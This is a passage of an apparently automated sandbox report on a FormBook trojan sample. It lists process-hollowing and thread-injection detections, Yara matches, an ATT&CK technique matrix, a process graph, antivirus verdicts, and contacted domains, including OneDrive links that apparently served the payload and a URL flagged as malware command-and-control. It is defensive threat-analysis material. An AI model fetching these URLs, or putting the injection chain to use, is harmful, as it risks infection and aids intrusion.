          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E596E0 NtFreeVirtualMemory,LdrInitializeThunk,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\colorcpl.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 870000
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 10410000
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 4A80000
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 4FA0000
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 10410000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 4A80000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 4FA0000 protect: page execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 10410000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\colorcpl.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 3324
          Creates a thread in another existing process (thread injection)
          Source: C:\Users\user\Desktop\0321423605241625.exeThread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 4FA0000
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\colorcpl.exe"
          Source: explorer.exe, 00000002.00000000.333633898.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.387636315.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.435849586.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.435849586.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.310463769.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.352140639.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000002.00000000.435849586.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.310463769.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.352140639.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.435849586.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.310463769.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.352140639.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.351540998.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.434029800.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.309952416.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: GetLocaleInfoA,
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: GetLocaleInfoA,
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02179438 GetLocalTime,
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217B938 GetVersionExA,

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API          		1
          Registry Run Keys / Startup Folder          		812
          Process Injection          		1
          Masquerading          		1
          Input Capture          		1
          System Time Discovery          		Remote Services1
          Input Capture          		Exfiltration Over Other Network Medium11
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Shared Modules          		1
          DLL Side-Loading          		1
          Registry Run Keys / Startup Folder          		1
          Virtualization/Sandbox Evasion          		LSASS Memory221
          Security Software Discovery          		Remote Desktop Protocol1
          Archive Collected Data          		Exfiltration Over Bluetooth2
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)1
          DLL Side-Loading          		812
          Process Injection          		Security Account Manager1
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Deobfuscate/Decode Files or Information          		NTDS3
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Obfuscated Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Software Packing          		Cached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          DLL Side-Loading          		DCSync114
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 756155 Sample: 0321423605241625.exe Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 36 www.thecuratedpour.com 2->36 38 www.segurofunerarioar.com 2->38 40 7 other IPs or domains 2->40 56 Snort IDS alert for network traffic 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for URL or domain 2->60 62 6 other signatures 2->62 11 0321423605241625.exe 1 18 2->11         started        signatures3 process4 dnsIp5 42 l-0003.l-dc-msedge.net 13.107.43.12, 443, 49708 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 11->42 44 ppqfqw.ph.files.1drv.com 11->44 46 2 other IPs or domains 11->46 32 C:\Users\Public\Libraries\Mwqrxeuz.exe, PE32 11->32 dropped 34 C:\Users\...\Mwqrxeuz.exe:Zone.Identifier, ASCII 11->34 dropped 74 Writes to foreign memory regions 11->74 76 Allocates memory in foreign processes 11->76 78 Creates a thread in another existing process (thread injection) 11->78 80 Injects a PE file into a foreign processes 11->80 16 colorcpl.exe 2 11->16         started        file6 signatures7 process8 signatures9 48 Modifies the context of a thread in another process (thread injection) 16->48 50 Maps a DLL or memory area into another process 16->50 52 Sample uses process hollowing technique 16->52 54 2 other signatures 16->54 19 explorer.exe 4 2 16->19 injected process10 process11 21 Mwqrxeuz.exe 19->21         started        24 raserver.exe 19->24         started        signatures12 64 Antivirus detection for dropped file 21->64 66 Multi AV Scanner detection for dropped file 21->66 68 Machine Learning detection for dropped file 21->68 26 colorcpl.exe 21->26         started        70 Maps a DLL or memory area into another process 24->70 72 Tries to detect virtualization through RDTSC time measurements 24->72 28 cmd.exe 1 24->28         started        process13 process14 30 conhost.exe 28->30         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          0321423605241625.exe36%ReversingLabsWin32.Trojan.Generic
          0321423605241625.exe41%VirustotalBrowse
          0321423605241625.exe100%AviraHEUR/AGEN.1214697
          0321423605241625.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\Libraries\Mwqrxeuz.exe100%AviraHEUR/AGEN.1214697
          C:\Users\Public\Libraries\Mwqrxeuz.exe100%Joe Sandbox ML
          C:\Users\Public\Libraries\Mwqrxeuz.exe36%ReversingLabsWin32.Trojan.Generic

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.0.colorcpl.exe.10410000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.0321423605241625.exe.400000.0.unpack100%AviraHEUR/AGEN.1214697Download File
          0.2.0321423605241625.exe.2170000.0.unpack100%AviraTR/Hijacker.GenDownload File
          1.0.colorcpl.exe.10410000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.raserver.exe.525796c.4.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
          1.0.colorcpl.exe.10410000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.colorcpl.exe.10410000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.raserver.exe.a3cda0.1.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
          0.2.0321423605241625.exe.3baeed8.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          3.2.Mwqrxeuz.exe.2598248.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.0.colorcpl.exe.10410000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.0321423605241625.exe.2231218.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.0321423605241625.exe.2278248.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.rematedeldia.com/euv4/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.kuechenpruefer.com
          		217.160.0.95
          		truetrue
            		unknown
            librairie-adrienne.com
            		192.0.78.141
            		truetrue
              		unknown
              l-0003.l-dc-msedge.net
              		13.107.43.12
              		truefalse
                		unknown
                www.customapronsnow.com
                		52.85.92.84
                		truetrue
                  		unknown
                  shops.myshopify.com
                  		23.227.38.74
                  		truefalse
                    		unknown
                    www.thecuratedpour.com
                    		unknown
                    		unknowntrue
                      		unknown
                      onedrive.live.com
                      		unknown
                      		unknownfalse
                        		high
                        www.segurofunerarioar.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.librairie-adrienne.com
                          		unknown
                          		unknowntrue
                            		unknown
                            ppqfqw.ph.files.1drv.com
                            		unknown
                            		unknownfalse
                              		high
                              www.rematedeldia.com
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                www.rematedeldia.com/euv4/true
                                • Avira URL Cloud: malware
                                		low
                                https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PRESPN2npofalse
                                  		high
                                  https://ppqfqw.ph.files.1drv.com/y4mCDNCh3rnIYpJlqIqXCF9hAcHbqZ_4sWcNl3-omCYoNehN1gOwskkZvXxiCnSz1O3rlGujQmh2dpM-9vT8IEOnYjevggDBPg3L6krVTX5rpZ6Y9fWqq7mXN8HP0HSdlr6-fMy35G8DvzJqxvSasnXVIJpB-5dNG-tdgdNk_U_XYoTZ1ccJrC1sgInwIFqmsOi4T1bkt9-CIDRF_pvQqcEQA/Mwqrxeuzvim?download&psid=1false
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://ppqfqw.ph.files.1drv.com/y4mcSg4TVpIg-eA6Y1ciUp4Dzz62AcO4SwOj-306Rp8dovP_vJs6bBF8upLxcpz7eVd0321423605241625.exe, 00000000.00000002.307309131.0000000000858000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.301144762.0000000000850000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.351845290.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.310261242.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.434855289.0000000000921000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://ppqfqw.ph.files.1drv.com/y4mCDNCh3rnIYpJlqIqXCF9hAcHbqZ_4sWcNl3-omCYoNehN1gOwskkZvXxiCnSz1O30321423605241625.exe, 00000000.00000003.301289184.000000000089F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://ppqfqw.ph.files.1drv.com/U00321423605241625.exe, 00000000.00000003.301178169.0000000000864000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://ppqfqw.ph.files.1drv.com/0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.301178169.0000000000864000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307357943.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PR0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://ppqfqw.ph.files.1drv.com/_0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307576454.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://onedrive.live.com/0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ppqfqw.ph.files.1drv.com/s0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307576454.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      13.107.43.12
                                                      		l-0003.l-dc-msedge.netUnited States
                                                      		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                                      General Information

                                                      Joe Sandbox Version:36.0.0 Rainbow Opal
                                                      Analysis ID:756155
                                                      Start date and time:2022-11-29 18:23:06 +01:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 10m 2s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:0321423605241625.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.evad.winEXE@11/5@8/1
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:
                                                      • Successful, ratio: 98.9% (good quality ratio 86.8%)
                                                      • Quality average: 75%
                                                      • Quality standard deviation: 33.7%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, conhost.exe
                                                      • TCP Packets have been reduced to 100
                                                      • Excluded IPs from analysis (whitelisted): 13.107.42.13
                                                      • Excluded domains from analysis (whitelisted): l-0004.l-msedge.net, odc-web-brs.onedrive.akadns.net, client.wns.windows.com, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-web-geo.onedrive.akadns.net, ph-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-ph-files-geo.onedrive.akadns.net, odc-ph-files-brs.onedrive.akadns.net
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      18:23:59API Interceptor1x Sleep call for process: 0321423605241625.exe modified
